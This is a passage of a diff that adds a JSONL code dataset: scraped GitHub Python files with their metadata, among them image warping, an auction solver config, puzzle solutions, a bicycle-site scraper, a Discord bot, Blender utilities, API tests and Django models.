diff --git "a/3186.jsonl" "b/3186.jsonl" new file mode 100644--- /dev/null +++ "b/3186.jsonl" @@ -0,0 +1,1591 @@ +{"seq_id":"11404918938","text":"import numpy as np\nimport skimage.io as skio\nimport matplotlib.pyplot as plt\n\nimport utils\nimport face_point_parser as fp\nimport triangulate as tri\nimport transform_midway as trans\n\ndef warp_face_geom(im, pts1, pts2):\n\tpts1 = np.fliplr(pts1)\n\tpts2 = np.fliplr(pts2)\n\tcorners = np.array([[0, 0], [0, im.shape[0]-1], [im.shape[1]-1, 0], [im.shape[1]-1, im.shape[0]-1]])\n\tpts1_corners = np.vstack((pts1, corners))\n\tpts2_corners = np.vstack((pts2, corners))\n\n\ttriangulation = tri.triangulate_scipy(pts2)\n\ttriangulation_corners = tri.triangulate_scipy(pts2_corners)\n\n\t# tri.show_triangles_scipy(joe, joe, triangulation, pts1, pts2)\n\twarped_corners = trans.get_midshape_interp(im/255, pts1_corners, pts2_corners, triangulation_corners)\n\twarped = warped_corners#trans.get_midshape_interp(im/255, pts1, pts2, triangulation)\n\treturn warped, warped_corners\n\ndef warp_face_points(face_points, joe, multiplier=3, point_nums=(6,6), warp_func=np.sqrt):\n\tcenter = (face_points[point_nums[0]]+face_points[point_nums[1]])/2\n\tcentered_points = face_points-center\n\trads = (centered_points[:,0]**2 + centered_points[:,1]**2)**0.5\n\tmean_rad = np.mean(rads)\n\tthetas = np.arctan2(centered_points[:,0], centered_points[:,1])\n\n\twarped_rads = warp_func(rads, thetas, multiplier)\n\n\twarped_carts = np.zeros_like(face_points)\n\twarped_carts[:,0] = warped_rads*np.sin(thetas)#*mean_rad**0.5\n\twarped_carts[:,1] = warped_rads*np.cos(thetas)#*mean_rad**0.5\n\twarped_carts += center\n\n\t#utils.scatter_pts(warped_carts)\n\t#utils.show_image(joe)\n\treturn warped_carts\n\nif __name__ == '__main__':\n\tname = \"yarden\"\n\tjoe = skio.imread(f\"cropped_photos/{name}_cropped.jpg\")\n\tface_points = fp.get_face_points(name)\n\tface_points = face_points/np.array([joe.shape[1]-1, joe.shape[0]-1])\n\t\n\tbarrel = lambda r: np.std(r)*2*np.arcsin(np.abs((r-np.mean(r))/np.std(r)))/np.pi+np.mean(r)\n\texp_barrel = lambda r: r**1.5\n\t\n\tnormal_sqrt = lambda r, theta, m: m*np.sqrt(r)\n\tdef special_sqrt(r, theta, m):\n\t\tnew_r = np.zeros_like(r)\n\t\tnew_r[(theta >= 0)] = r[(theta >= 0)]\n\t\tnew_r[(theta < 0)] = m*np.sqrt(r[theta < 0])\n\t\treturn new_r\n\n\tdef normal_arcsin(r,theta,m):\n\t\treturn m*2*np.arcsin(r*2)/np.pi\n\n\tdef normal_log(r,theta,m):\n\t\treturn np.log(m*r+1)\n\n\tfish_eye = lambda r,theta,m: 2*m*np.sin(theta/2)\n\n\tpts2 = warp_face_points(face_points, joe, multiplier=1, point_nums=(13, 14), warp_func=normal_log)\n\tpts3 = warp_face_points(pts2, joe, multiplier=2, point_nums=(153, 159), warp_func=normal_log)\n\tpts4 = warp_face_points(pts3, joe, multiplier=2, point_nums=(386, 380), warp_func=normal_log)\n\tface_points*=np.array([joe.shape[1]-1, joe.shape[0]-1])\n\tutils.scatter_pts(face_points)\n\tutils.show_image(joe)\n\tpts4*=np.array([joe.shape[1]-1, joe.shape[0]-1])\n\tutils.scatter_pts(pts4)\n\tutils.show_image(joe)\n\twarped, warped_corners = warp_face_geom(joe, face_points, pts4)\n\tutils.show_image(warped)\n\tutils.show_image(warped_corners)\n\n\n\t\n","repo_name":"THE-COB/homunculize-me","sub_path":"face_warp.py","file_name":"face_warp.py","file_ext":"py","file_size_in_byte":2875,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"39791439763","text":"import datetime as dt\nimport itertools\nfrom typing import List, Tuple, Dict, Sequence, Union\n\nfrom auction_module import auction as au, bidding as bd, winner_determination as wd\nfrom auction_module.request_selection import request_selection as rs, individual as rsi, bundle as rsb, neighbor as rsn\nfrom auction_module.bundle_and_partition_valuation import partition_valuation as pv\nfrom auction_module.bundle_generation import bundle_gen as bg, partition_based_bg as bgp\nfrom routing_module import neighborhoods as nh, tour_construction as cns, metaheuristics as mh\nfrom tw_management_module import tw_offering as two, tw_selection as tws, request_acceptance as ra\n\n\ndef configs():\n \"\"\"\n generate dicts with all parameters are required to initialize a slv.Solver.\n \"\"\"\n\n s_tour_construction: Sequence[cns.VRPTWInsertionConstruction] = [\n # cns.VRPTWMinTravelDistanceInsertion(),\n cns.VRPTWMinTravelDurationInsertion()\n # cns.MinTimeShiftInsertion()\n ]\n\n # t = float('inf') if ut.debugger_is_active() else 5\n t = 2\n s_tour_improvement: Sequence[mh.VRPTWMetaHeuristic] = [\n mh.NoMetaheuristic([nh.NoNeighborhood()], None),\n # mh.LocalSearchFirst([nh.VRPTWMoveDur()], 1),\n # mh.LocalSearchFirst([nh.VRPTWTwoOptDur()], 1),\n # mh.LocalSearchBest([nh.VRPTWMoveDur()], 1),\n # mh.VRPTWVariableNeighborhoodDescent([nh.VRPTWRelocateDur(), nh.VRPTWMoveDur(), nh.VRPTWTwoOptDurMax4()], t),\n # mh.VRPTWSequentialLocalSearch([nh.VRPTWTwoOptDur(), nh.VRPTWMoveDur(), nh.VRPTWRelocateDur()], t)\n ]\n\n s_max_num_accepted_infeasible: Sequence[int] = [0]\n\n s_request_acceptance_attractiveness: Sequence[ra.RequestAcceptanceAttractiveness] = [ra.Dummy()]\n\n s_time_window_length: Sequence[dt.timedelta] = [\n # dt.timedelta(hours=1),\n dt.timedelta(hours=2),\n # dt.timedelta(hours=4),\n # dt.timedelta(hours=8),\n ]\n\n s_time_window_offering: two.TWOfferingBehavior.__class__ = [\n two.FeasibleTW,\n ]\n\n s_time_window_selection: Sequence[tws.TWSelectionBehavior] = [\n tws.UnequalPreference(),\n # tws.UniformPreference(),\n ]\n\n # by setting this to an empty sequence, no collaborative solutions will be generated\n s_num_submitted_requests: Sequence[Union[int, float]] = [\n 0.1,\n 0.2,\n ]\n\n s_request_selection: Sequence[rs.RequestSelectionBehavior.__class__] = [\n rsi.Random,\n rsi.DepotDurations,\n rsi.MarginalCostProxy,\n rsi.EarlyTimeWindow,\n rsn.TemporalSpatialNeighbors,\n ]\n\n s_num_auction_bundles: Sequence[int] = [\n # 50,\n 100,\n # 200,\n # 300,\n # 500\n ]\n\n s_bundle_generation: Sequence[Tuple[bg.BundleGenerationBehavior.__class__, Dict[str, float]]] = [\n (bgp.GeneticAlgorithm, dict(population_size=300,\n num_generations=100,\n mutation_rate=0.5,\n generation_gap=0.9, )\n ),\n # (bgp.BestOfAllPartitions, dict()),\n (bgp.RandomMaxKPartitions, dict()) # currently better than the GA\n ]\n\n s_partition_valuation: Sequence[pv.PartitionValuation.__class__] = [\n # bv.GHProxyPartitionValuation,\n # bv.MinDistancePartitionValuation,\n # bv.MinDurationPartitionValuation,\n pv.SumTravelDurationPartitionValuation,\n # bv.LosSchultePartitionValuation,\n # bv.RandomPartitionValuation,\n ]\n\n s_auction_policy: List[Dict] = [\n {'num_intermediate_auctions': 0, 'num_intermediate_auction_rounds': 0, 'num_final_auction_rounds': 1},\n # {'num_intermediate_auctions': 0, 'num_intermediate_auction_rounds': 0, 'num_final_auction_rounds': 2},\n # {'num_intermediate_auctions': 1, 'num_intermediate_auction_rounds': 1, 'num_final_auction_rounds': 1},\n ]\n\n # ===== Nested Parameter Loops =====\n for tour_construction, tour_improvement, max_num_accepted_infeasible, \\\n request_acceptance_attractiveness, time_window_length, time_window_offering, \\\n time_window_selection in itertools.product(s_tour_construction,\n s_tour_improvement,\n s_max_num_accepted_infeasible,\n s_request_acceptance_attractiveness,\n s_time_window_length,\n s_time_window_offering,\n s_time_window_selection\n ):\n\n request_acceptance = ra.RequestAcceptanceBehavior(\n max_num_accepted_infeasible,\n request_acceptance_attractiveness,\n time_window_offering(time_window_length),\n time_window_selection\n )\n\n # ===== Isolated Planning Parameters, no auction =====\n isolated_planning = dict(\n request_acceptance=request_acceptance,\n tour_construction=tour_construction,\n tour_improvement=tour_improvement,\n num_intermediate_auctions=0,\n intermediate_auction=False,\n final_auction=False,\n )\n yield isolated_planning\n\n # auction-specific parameters\n for num_submitted_requests in s_num_submitted_requests:\n for request_selection in s_request_selection:\n for num_auction_bundles in s_num_auction_bundles:\n for bundle_generation, bundle_generation_kwargs in s_bundle_generation:\n for partition_valuation in s_partition_valuation:\n for auction_policy in s_auction_policy:\n\n # ===== INTERMEDIATE AUCTIONS =====\n if auction_policy['num_intermediate_auctions'] > 0:\n assert num_submitted_requests % 2 == 0\n total_nsr_int = num_submitted_requests // 2\n total_nsr_fin = num_submitted_requests // 2\n\n assert total_nsr_int % auction_policy[\n 'num_intermediate_auctions'] == 0\n nsr_int = total_nsr_int // auction_policy[\n 'num_intermediate_auctions']\n\n assert nsr_int % auction_policy[\n 'num_intermediate_auction_rounds'] == 0\n nsr_int_round = nsr_int // auction_policy[\n 'num_intermediate_auction_rounds']\n\n intermediate_auction = au.Auction(\n tour_construction=tour_construction,\n tour_improvement=tour_improvement,\n request_selection=request_selection(nsr_int_round),\n bundle_generation=bundle_generation(\n # TODO is it fair to divide by num_int_auctions?\n num_auction_bundles=num_auction_bundles,\n # / auction_policy['num_intermediate_auctions'],\n partition_valuation=partition_valuation(),\n **bundle_generation_kwargs\n ),\n bidding=bd.ClearAndReinsertAll(tour_construction,\n tour_improvement\n ),\n winner_determination=wd.MaxBidGurobiCAP1(),\n # TODO add proper parameter\n num_auction_rounds=auction_policy[\n 'num_intermediate_auction_rounds']\n )\n else:\n total_nsr_fin = num_submitted_requests\n intermediate_auction = False\n\n # ===== FINAL AUCTION =====\n if auction_policy['num_final_auction_rounds'] > 1:\n assert total_nsr_fin % auction_policy[\n 'num_final_auction_rounds'] == 0\n nsr_fin_round = total_nsr_fin // auction_policy[\n 'num_final_auction_rounds']\n else:\n nsr_fin_round = num_submitted_requests\n\n final_auction = au.Auction(\n tour_construction=tour_construction,\n tour_improvement=tour_improvement,\n request_selection=request_selection(nsr_fin_round),\n bundle_generation=bundle_generation(\n # TODO is it fair to divide by num_int_auctions?\n num_auction_bundles=num_auction_bundles,\n # / auction_policy['num_intermediate_auctions'],\n partition_valuation=partition_valuation(),\n **bundle_generation_kwargs\n ),\n bidding=bd.ClearAndReinsertAll(tour_construction,\n tour_improvement\n ),\n winner_determination=wd.MaxBidGurobiCAP1(),\n num_auction_rounds=auction_policy[\n 'num_final_auction_rounds']\n )\n\n collaborative_planning = dict(\n request_acceptance=request_acceptance,\n tour_construction=tour_construction,\n tour_improvement=tour_improvement,\n num_intermediate_auctions=auction_policy[\n 'num_intermediate_auctions'],\n intermediate_auction=intermediate_auction,\n final_auction=final_auction,\n )\n\n yield collaborative_planning\n","repo_name":"Eddbaggio/CR_AHD","sub_path":"Python/src/cr_ahd/solver_module/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":10950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"18805447964","text":"adjacents = (\n ( 1, 0, 0),\n (-1, 0, 0),\n ( 0, 1, 0),\n ( 0,-1, 0),\n ( 0, 0, 1),\n ( 0, 0,-1))\n\n\ndef new_coord(coord, adj):\n return (\n coord[0] + adj[0],\n coord[1] + adj[1],\n coord[2] + adj[2])\n\n\ndef adjacent_coords(coord):\n for adjacent in adjacents:\n yield new_coord(coord, adjacent)\n\n\ndef load_cubes(data):\n all_cubes = []\n for line in data:\n cube = tuple(map(int, line.split(',')))\n all_cubes.append(cube)\n \n return all_cubes\n\n\ndef group_cubes(all_cubes):\n cube_groups = []\n while len(all_cubes) > 0:\n cube_stack = [all_cubes.pop(0)]\n cube_group = []\n while len(cube_stack) > 0:\n cube = cube_stack.pop(0)\n cube_group.append(cube)\n\n for adj_cube in adjacent_coords(cube):\n if adj_cube in all_cubes:\n all_cubes.remove(adj_cube)\n cube_stack.append(adj_cube)\n \n cube_groups.append(cube_group)\n\n return cube_groups\n\n\ndef count_sides_a(cubes):\n sides = 0\n for cube in cubes:\n for adj_cube in adjacent_coords(cube):\n if adj_cube not in cubes:\n sides += 1\n\n return sides\n\n\ndef count_sides_b(cubes, air_cubes):\n sides = 0\n for cube in cubes:\n for adj_cube in adjacent_coords(cube):\n if adj_cube in cubes:\n continue\n\n if adj_cube not in air_cubes:\n continue\n\n sides += 1\n\n return sides\n\n\ndef simulate(data):\n all_cubes = load_cubes(data)\n \n max_x = max((cube[0] for cube in all_cubes)) + 1\n max_y = max((cube[1] for cube in all_cubes)) + 1\n max_z = max((cube[2] for cube in all_cubes)) + 1\n print(max_x, max_y, max_z)\n\n air_cubes = set()\n air_stack = [(-1, -1, -1)]\n seen_cubes = set(air_stack[0])\n\n while len(air_stack) > 0:\n cube = air_stack.pop(0)\n air_cubes.add(cube)\n seen_cubes.add(cube)\n\n for adj_cube in adjacent_coords(cube):\n if adj_cube in all_cubes:\n continue\n\n if adj_cube in seen_cubes:\n continue\n\n if not (-1 <= adj_cube[0] <= max_x):\n continue\n\n if not (-1 <= adj_cube[1] <= max_y):\n continue\n\n if not (-1 <= adj_cube[2] <= max_z):\n continue\n\n seen_cubes.add(adj_cube)\n air_stack.append(adj_cube)\n \n print(len(air_cubes))\n\n cube_groups = group_cubes(all_cubes)\n\n print(len(cube_groups))\n\n total_sides_a = 0\n total_sides_b = 0\n for cube_group in cube_groups:\n sides_a = count_sides_a(cube_group)\n sides_b = count_sides_b(cube_group, air_cubes)\n\n print(len(cube_group), sides_a, sides_b)\n total_sides_a += sides_a\n total_sides_b += sides_b\n\n # code here\n return total_sides_a, total_sides_b\n\n\ndef get_data(file_name):\n data = []\n with open(file_name, 'rt') as fh:\n for line in fh:\n data.append(line.strip())\n \n return data\n\n\ndef main():\n data = get_data('data/input_018.txt')\n results = simulate(data)\n print(results[0], '==' , 3396)\n print(results[1], '==' , 2044)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"kloptops/AdventOfCode","sub_path":"2022/aoc_018.py","file_name":"aoc_018.py","file_ext":"py","file_size_in_byte":3255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"72731382032","text":"'''\n정점 번호 V = 1 ~ (E+1)\n간선 수\n부모-자식 순\n4\n1 2 1 3 3 4 3 5\n'''\n\n\ndef preorder(n): # 전위순회\n if n:\n print(n) # visit(n)\n preorder(ch1[n])\n preorder(ch2[n])\n\n\ndef inorder(n): # 중위순회\n if n:\n inorder(ch1[n])\n print(n) # visit(n)\n inorder(ch2[n])\n\n\ndef postorder(n):\n if n:\n postorder(ch1[n])\n postorder(ch2[n])\n print(n) # visit(n)\n\n\nE = int(input())\narr = list(map(int, input().split()))\nV = E + 1\nroot = 1\n# 부모를 인덱스로 자식 번호 저장\nch1 = [0] * (V + 1)\nch2 = [0] * (V + 1)\nfor i in range(E):\n p, c = arr[i*2], arr[i*2 + 1]\n if ch1[p] == 0:\n ch1[p] = c\n else:\n ch2[p] = c\n\ninorder(root)\n","repo_name":"DY-Shin/TIL","sub_path":"Algorithm/tree1.py","file_name":"tree1.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5456322803","text":"from pandas.core.indexes import base\nfrom bn_zest import BayesianNetwork\nimport os\n\nROOT_DIR = os.path.dirname(os.path.abspath(__file__))\nMODELS_DIR = os.path.join(ROOT_DIR, 'models')\nASSETS_DIR = os.path.join(ROOT_DIR, 'assets')\n\nmodel = BayesianNetwork.from_cmpx(os.path.join(MODELS_DIR, 'bendi_bn_2020_07_21.cmpx'))\n\ndef npt_to_html(variable, **kwargs):\n return variable.npt.to_df().to_html(**kwargs)\n\n\nhtml_tables = (npt_to_html(variable, bold_rows=True, border=1) for variable in model.variables)\n\nwith open(os.path.join(ASSETS_DIR, 'base.html'), 'r') as html_file:\n\n base_string = html_file.read()\n\ntables_string = '\\n
\\n'.join(html_tables)\n\nbase_string = base_string.replace(r'{{content}}', tables_string)\n\nwith open(os.path.join(ASSETS_DIR, 'tables.html'), 'w') as output_file:\n\n output_file.write(base_string)","repo_name":"cjoyneruk/bn_zest","sub_path":"examples/npt_export.py","file_name":"npt_export.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"13543046695","text":"import asyncio\nfrom typing import Union, Optional\n\nimport discord\nfrom discord import Thread\nfrom discord.abc import PrivateChannel\nfrom discord.ext import commands\nfrom discord import guild\n\nfrom data import db\n\n\nasync def refresh_verification(bot: commands.Bot):\n while True:\n for ukey in db.database.players.keys():\n user = db.database.Player(ukey)\n chnId: Optional[int] = user.vf_message_channel\n msgId = user.vf_message_id\n\n if (chnId is None) or (msgId is None):\n continue\n\n print(f\"Checking user {ukey}\")\n try:\n chn: Union[guild.GuildChannel, PrivateChannel, Thread] = await bot.fetch_channel(chnId)\n except discord.Forbidden:\n user.vf_message_channel = None\n print(f\"Channel cannot be accessed\")\n return\n\n if chn is None:\n user.vf_message_channel = None\n print(f\"Channel not found\")\n \n else:\n try:\n await chn.fetch_message(msgId)\n except discord.DiscordException:\n user.vf_message_id = None\n print(f\"Message not found\")\n\n await asyncio.sleep(5 * 60)\n","repo_name":"abiriadev/rabirobot","sub_path":"coroutines.py","file_name":"coroutines.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"16547596297","text":"import logging\nimport requests\nimport json\nfrom pprint import pprint\nfrom bs4 import BeautifulSoup\n\nheader = {'User-agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36'}\nLOG_FORMAT = \"%(levelname)s %(asctime)s - %(message)s\"\n\nlogging.basicConfig(filename=\"./giant.log\", level=logging.DEBUG, format=LOG_FORMAT, filemode='w')\nlogger = logging.getLogger()\n\n\nclass Bike:\n def __init__(self, name, price, price_str, specs):\n self.name = name\n self.price = price\n self.price_str = price_str\n self.specs = specs\n\n def __repr__(self):\n from pprint import pformat\n return pformat(vars(self))\n\n\ndef get_bike_stats_for_bike_site(rel_link: str):\n base_link = \"https://www.giant-bicycles.com\"\n link = base_link + rel_link\n\n soup = BeautifulSoup(requests.get(link).text, features=\"html.parser\")\n logging.debug(soup)\n\n price_str = soup.find(\"div\", {\"class\": \"price\"}).text\n price = price_str\n price = price.replace(\"€\", \"\")\n price = price.replace(\".\", \"\")\n price = price.replace(\" \", \"\")\n price = int(price)\n\n spec_table = soup.find(\"ul\", {\"class\": \"specifications\"})\n spec_table = spec_table.find_all(\"li\", {\"class\", \"datarow\"})\n specs = []\n for i in spec_table:\n label = i.find(\"div\", {\"class\", \"label\"}).text\n value = i.find(\"div\", {\"class\", \"value\"}).text\n specs.append({label: value})\n return Bike(rel_link, price, price_str, specs)\n\n\ndef check_multiple(link: str):\n \"\"\" gets something like https://www.giant-bicycles.com/de/trance-x-1-2023 \"\"\"\n soup = BeautifulSoup(requests.get(link).text, features=\"html.parser\")\n logging.debug(soup)\n\n just_one = soup.find(\"div\", {\"class\": \"breadcrumbs\"})\n if just_one is None:\n # if there is more than one bike on the site return the bike sites\n logging.debug(\"more than one\")\n bikes = soup.find_all(\"a\", {\"class\": \"textlink track-GA4-event\"})\n return bikes\n logging.debug(\"just one\")\n return 0\n\n\ndef parse_site(link: str):\n logging.debug(link)\n soup = BeautifulSoup(requests.get(link).text, features=\"html.parser\")\n logging.debug(soup)\n\n table_of_bikes = soup.find(\"div\", {\"id\": \"productsContainer\"})\n bikes_on_table = table_of_bikes.find_all(\"a\", {\"class\": \"textlink track-GA4-event\"})\n rel_bike_sites = get_rel_bike_sites(bikes_on_table)\n\n all_bikes = []\n\n for i in rel_bike_sites:\n all_bikes.append(get_bike_stats_for_bike_site(i))\n all_bikes.sort(key=lambda x: x.price)\n for i in all_bikes:\n pprint(i)\n print()\n\n\ndef get_rel_bike_sites(bike_table) -> []:\n names = []\n base_link = \"https://www.giant-bicycles.com\"\n for i in bike_table:\n full_bike_name = parse_bike_name(i)\n if full_bike_name == \"\":\n continue\n bike_link = base_link + full_bike_name # check if multiple\n\n multiple = check_multiple(bike_link)\n if multiple == 0: # just one\n names.append(full_bike_name)\n else:\n for j in multiple:\n full_bike_name = parse_bike_name(j)\n if full_bike_name == \"\":\n continue\n names.append(full_bike_name)\n return names\n\n\ndef parse_bike_name(bike_html):\n bike = bike_html[\"data-ga4_items\"]\n bike = bike.strip('[]')\n bike = json.loads(bike)\n # {'item_id': 'series-1175', 'item_name': 'reign advanced pro', 'index': 3, 'item_brand': 'giant', 'item_category': 'bikes', 'item_category2': 'mountain bikes', 'item_category3': 'full suspension', 'price': 5299.0, 'discount': 0.0, 'quantity': 1}\n bike_name = bike[\"item_name\"]\n if bike_name == \"\":\n return bike_name\n full_bike_name = bike_html[\"href\"]\n return full_bike_name\n\n\ndef main():\n links = [\n \"https://www.giant-bicycles.com/de/bikes/mountain/full-suspension\"\n ]\n for i in links:\n parse_site(i)\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"ammernico/giant","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34518109020","text":"import bpy\nimport logging\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef enforce_constraint_order(armature, action):\n bones = get_affected_bones(armature, action)\n current_active_bone = armature.bones.active\n for bone in bones:\n constraints = bone.constraints\n\n action_constraints = [c.name for c in constraints if c.type == \"ACTION\"]\n translate_constraints = sorted(\n [c for c in action_constraints if \"translate\" in c]\n )\n rotate_scale_constraints = sorted(\n [c for c in action_constraints if \"rotate_scale\" in c]\n )\n unsplit_constraints = sorted(\n list(\n set(action_constraints)\n - set(translate_constraints)\n - set(rotate_scale_constraints)\n )\n )\n\n ordered_action_names = (\n translate_constraints + rotate_scale_constraints + unsplit_constraints\n )\n\n armature.bones.active = bone.bone\n reorder_constraints(bone, ordered_action_names)\n armature.bones.active = current_active_bone\n\n\ndef get_affected_bones(armature, action):\n armature_ob = bpy.data.objects[armature.name]\n return [b for b in armature_ob.pose.bones if b.name in action.groups]\n\n\ndef reorder_constraints(bone, ordered_action_names):\n def sort_constraint_as_actions(item):\n return ordered_action_names.index(item.name)\n\n constraints = [c for c in bone.constraints if c.type == \"ACTION\"]\n\n ordered_constraints = sorted(constraints, key=sort_constraint_as_actions)\n\n for expected_index, constraint in enumerate(ordered_constraints):\n\n ctx = bpy.context.copy()\n ctx[\"constraint\"] = constraint\n\n current_index = bone.constraints.find(constraint.name)\n if current_index > expected_index:\n while current_index != expected_index:\n previous_index = current_index\n bpy.ops.constraint.move_up(\n ctx, constraint=constraint.name, owner=\"BONE\"\n )\n current_index = bone.constraints.find(constraint.name)\n if previous_index == current_index:\n raise Exception(\n \"Failed to move the constraint {}. The bone {} is probably hidden\".format(\n constraint.name, bone.name\n )\n )\n elif current_index < expected_index:\n while current_index != expected_index:\n previous_index = current_index\n bpy.ops.constraint.move_down(\n ctx, constraint=constraint.name, owner=\"BONE\"\n )\n current_index = bone.constraints.find(constraint.name)\n if previous_index == current_index:\n raise Exception(\n \"Failed to move the constraint {}. The bone {} is probably hidden\".format(\n constraint.name, bone.name\n )\n )\n","repo_name":"Muream/actionman","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"83"} +{"seq_id":"10456510944","text":"from openapi_server.apis.utils import error_handling\nfrom fastapi.exceptions import HTTPException\nfrom caselawclient.Client import (\n MarklogicUnauthorizedError,\n MarklogicValidationFailedError,\n)\nfrom unittest.mock import Mock\nimport pytest\n\n\ndef test_error_handling_no_exception():\n def example():\n with error_handling():\n return 4\n\n assert example() == 4\n\n\ndef test_error_handling_python_error(caplog):\n \"\"\"\n Given you will get a standard Python exception\n When using error_handling\n Then the error response:\n contains a very generic error with no contents\n has a relevant status code\n And outputs the message and traceback to the logs\n \"\"\"\n\n def example():\n with error_handling():\n 1 / 0\n\n with pytest.raises(HTTPException) as ex:\n example()\n assert ex.value.detail == \"An unknown error occurred outside of Marklogic.\"\n assert ex.value.status_code == 500\n assert \"division by zero\" in caplog.text\n assert \"1 / 0\" in caplog.text\n\n\ndef test_validation_error(caplog):\n \"\"\"\n Given you will get a validation MarklogicAPIError exception\n When using error_handling\n Then the error response:\n contains the marklogic error message\n is the default message\n has a relevant status code\n And outputs the message to the logs\n \"\"\"\n\n def example():\n e = MarklogicValidationFailedError(\"error_msg\")\n e.response = Mock()\n e.response.content = b'a message from marklogic' # noqa:E501\n\n with error_handling():\n raise e\n\n with pytest.raises(HTTPException) as ex:\n example()\n\n assert ex.value.detail == \"a message from marklogic\"\n assert ex.value.status_code == 422\n assert \"error_msg\" in caplog.text\n\n\ndef test_non_validation_error(caplog):\n \"\"\"\n Given you will get a non-validation MarklogicAPIError exception\n When using error_handling\n Then the error response:\n does not contain the marklogic error message\n is the default message\n has a relevant status code\n And outputs the message to the logs\n \"\"\"\n\n def example():\n e = MarklogicUnauthorizedError(\"error_msg\")\n e.response = Mock()\n e.response.content = b'a message from marklogic' # noqa:E501\n\n with error_handling():\n raise e\n\n with pytest.raises(HTTPException) as ex:\n example()\n\n assert \"a message from marklogic\" not in ex.value.detail\n assert \"Your credentials are not valid\" in ex.value.detail\n assert ex.value.status_code == 401\n assert \"error_msg\" in caplog.text\n","repo_name":"nationalarchives/ds-caselaw-privileged-api","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"31674736140","text":"\"\"\"\nLikes model class\n\"\"\"\n\nfrom flickipedia.model.base_model import BaseModel\nfrom flickipedia.config import log, schema\nfrom sqlalchemy.sql import func\n\n\nclass LikeModel(BaseModel):\n\n def __init__(self):\n super(LikeModel, self).__init__()\n\n def get_like(self, user_id, article_id, photo_id):\n \"\"\" Retrieve whether an object has been liked \"\"\"\n schema_obj = getattr(schema, 'Like')\n query_obj = self.io.session.query(schema_obj).filter(\n schema_obj.user_id == user_id,\n schema_obj.article_id == article_id,\n schema_obj.photo_id == photo_id,\n )\n res = self.alchemy_fetch_validate(query_obj)\n if len(res) > 0:\n return res[0]\n else:\n return None\n\n def get_likes_article_photo(self, article_id, photo_id, count=False):\n \"\"\" Retrieve the full set of endorsements for a article-photo \"\"\"\n schema_obj = getattr(schema, 'Like')\n res = self.io.session.query(schema_obj).filter(\n schema_obj.article_id == article_id,\n schema_obj.photo_id == photo_id,\n )\n if count:\n return res.count()\n else:\n return res.all()\n\n def insert_like(self, user_id, article_id, photo_id):\n return self.io.insert('Like', user_id=user_id,\n article_id=article_id, photo_id=photo_id)\n\n def delete_like(self, like_obj):\n return self.io.delete(like_obj)\n\n def get_most_likes(self, limit):\n \"\"\" Return likes counts by photo and article\"\"\"\n schema_obj = getattr(schema, 'Like')\n query_obj = self.io.session.query(\n schema_obj.photo_id, schema_obj.article_id, func.count(\n schema_obj.photo_id).label('cnt')).group_by(\n schema_obj.photo_id, schema_obj.article_id).order_by(\n 'cnt DESC').limit(limit)\n res = self.alchemy_fetch_validate(query_obj)\n return res\n\n","repo_name":"rfaulkner/Flickipedia","sub_path":"flickipedia/model/likes.py","file_name":"likes.py","file_ext":"py","file_size_in_byte":1977,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"70676821393","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ]\n\n operations = [\n migrations.CreateModel(\n name='MeasuredTemp',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('measuredOn', models.DateTimeField(auto_now_add=True)),\n ('temperature', models.FloatField(default=-99.0)),\n ('manual', models.BooleanField(default=False)),\n ('targetTemperature', models.FloatField(default=-99.0)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SavingHistory',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('startDate', models.DateTimeField()),\n ('endDate', models.DateTimeField()),\n ('saving', models.FloatField(default=None, null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SavingProposal',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('type', models.CharField(default=b'CAMP', max_length=4, choices=[(b'SCHE', b'Programmation'), (b'CAMP', b'Campagne')])),\n ('status', models.CharField(default=b'PROP', max_length=4, choices=[(b'PROP', b'Propos\\xc3\\xa9e'), (b'APPL', b'Appliqu\\xc3\\xa9e'), (b'DISM', b'Annul\\xc3\\xa9e'), (b'EXPI', b'Expir\\xc3\\xa9e')])),\n ('startValidityPeriod', models.DateTimeField()),\n ('endValidityPeriod', models.DateTimeField()),\n ('title', models.CharField(max_length=100)),\n ('content', models.CharField(max_length=1000)),\n ('amount', models.FloatField()),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SetPointHistory',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, 